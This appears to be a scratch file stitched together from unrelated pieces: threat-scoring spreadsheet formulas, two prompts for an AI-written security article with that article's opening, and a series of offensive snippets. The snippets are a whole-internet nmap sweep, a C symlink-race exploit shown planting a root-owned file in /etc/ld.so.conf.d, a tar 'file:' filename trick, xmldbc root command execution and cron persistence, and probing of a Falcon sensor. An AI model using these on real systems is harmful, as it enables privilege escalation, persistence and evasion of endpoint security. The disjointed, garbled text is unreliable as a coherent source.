Efficacy = (Value - Cost) * Practicality
Value = (IF(Efficacy of Ingestion="High", 25, IF(Efficacy of Ingestion="Low", 0.1, 12.5))+IF(Value of Domain="High", 25, IF(Value of Domain="Low", 0.1, 12.5)))*((LEN(Tactics Covered)-LEN(SUBSTITUTE(Tactics Covered,",",""))+1)/5)
Cost = IF(Cost of Deployment (Changed Required)="High", 0.1, IF(Cost of Deployment (Changed Required)="Low", 25, 12.5))+IF(Cost of Operation (Expected Throughput)="High", 0.1, IF(Cost of Operation (Expected Throughput)="Low", 100, 50))
Practicality = IF(Existing Capability="Yes", 1, IF(Existing Capability="No", 0.1, 0.5))+IF(Naturally Occurring="Yes", 1, IF(Naturally Occurring="No", 0.1, 0.5))

Prompt 1: "adopt the persona of a technical marketing editor and write me a marketing article about using AI for security. structure it to look like a breach report but ensure that you don't make up an IOCs or other forensic artefacts. i mean it, no hallucination of IOCs."
Prompt 2: "rewrite it to consider ai a threat"
---
# **When the Defender Becomes the Adversary: Understanding AI as a New Security Threat**
## Executive Summary
AI is transforming the cybersecurity landscape—but not always in the ways we expect. While organizations increasingly rely on AI for detection, correlation, and response, adversaries are quickly weaponizing AI to accelerate their own operations. Even more critically, AI systems inside the enterprise can become attack surfaces themselves: manipulable, misaligned, or leveraged to amplify existing threats.

$ sudo nmap -sn 0.0.0.0/0
$ wireshark -f "icmp and dst host <my IP>"
...
Wireshark filter: "data.data and (!(data.data == 00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00) and !(data.data == 10:11:12:13:14:15:16:17:18:19:1a:1b:1c:1d:1e:1f:20:21:22:23:24:25:26:27:28:29:2a:2b:2c:2d:2e:2f:30:31:32:33:34:35:36:37))"
Example: https://www.shodan.io/host/1.10.240.50

#include <unistd.h>
#include <stdio.h>
int main(int argc, char **argv) {
    while (symlink(argv[2], argv[1])) {
    }
    printf("w00t!\n");
}

$ ./sploit /var/opt/XXXXNN-XXX/XXXX/XXX/XNN.XXXXX /etc/ld.so.conf.d/pwnies.conf
w00p!
$ ls -la /etc/ld.so.conf.d/pwnies.conf
-rw-r--r-- 1 root root 101 Oct 19 15:32 /etc/ld.so.conf.d/pwnies.conf

$ tar --version
tar (GNU tar) 1.34
Copyright © 2021 Free Software Foundation, Inc.
Licence GPLv3+: GNU GPL version 3 or later <https://gnu.org/licenses/gpl.html>.
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law.
Written by John Gilmore and Jay Fenlason.
$ tar ztvf file\:M.m.p.tar.gz
The authenticity of host 'file (192.168.67.59)' can't be established.

$ python3 PiKC.py
=== System Parameters Summary ===
System Role: web server
Open Ports: [80, 443, 8080]
IP Addresses: ['203.0.113.50']
Software: Apache httpd 2.4.54
Interactive User: False
Critical Asset: False
Virtualized: False

If you don't need persistence, why work so hard?
$ rm /foo; xmldbc -t "test:10:touch /foo"; ls -la /foo; xmldbc -D /tmp/config.xml; sleep 20; ls -la /foo
ls: /foo: No such file or directory
-rw-r--r-- 1 root root 0 Jun 5 22:11 /foo

Say, for example, you wanted a cron entry that would run persist.sh every 5 minutes...
$ xmldbc -s /system_mgr/crond/list/count "9"
$ xmldbc -s /system_mgr/crond/list/name:9 "persist"
$ xmldbc -s /system_mgr/crond/persist/count "1"
$ xmldbc -s /system_mgr/crond/persist/item:1/method "3"
$ xmldbc -s /system_mgr/crond/persist/item:1/1 "*/5"
$ xmldbc -s /system_mgr/crond/persist/item:1/2 "*"
$ xmldbc -s /system_mgr/crond/persist/item:1/3 "*"
$ xmldbc -s /system_mgr/crond/persist/item:1/4 "*"

Falcon-sensor strace:
1185 init_module(0x556ce33f8b00, 204357, "") = 0
1185 init_module(0x556ce3430940, 122757, "") = 0
1185 init_module(0x556ce342a950, 24541, "") = 0
1185 init_module(0x7f33243be010, 1718317, "configbuild=1007.8.0012905.1") = 0
(gdb) catch syscall init_module
(gdb) run
…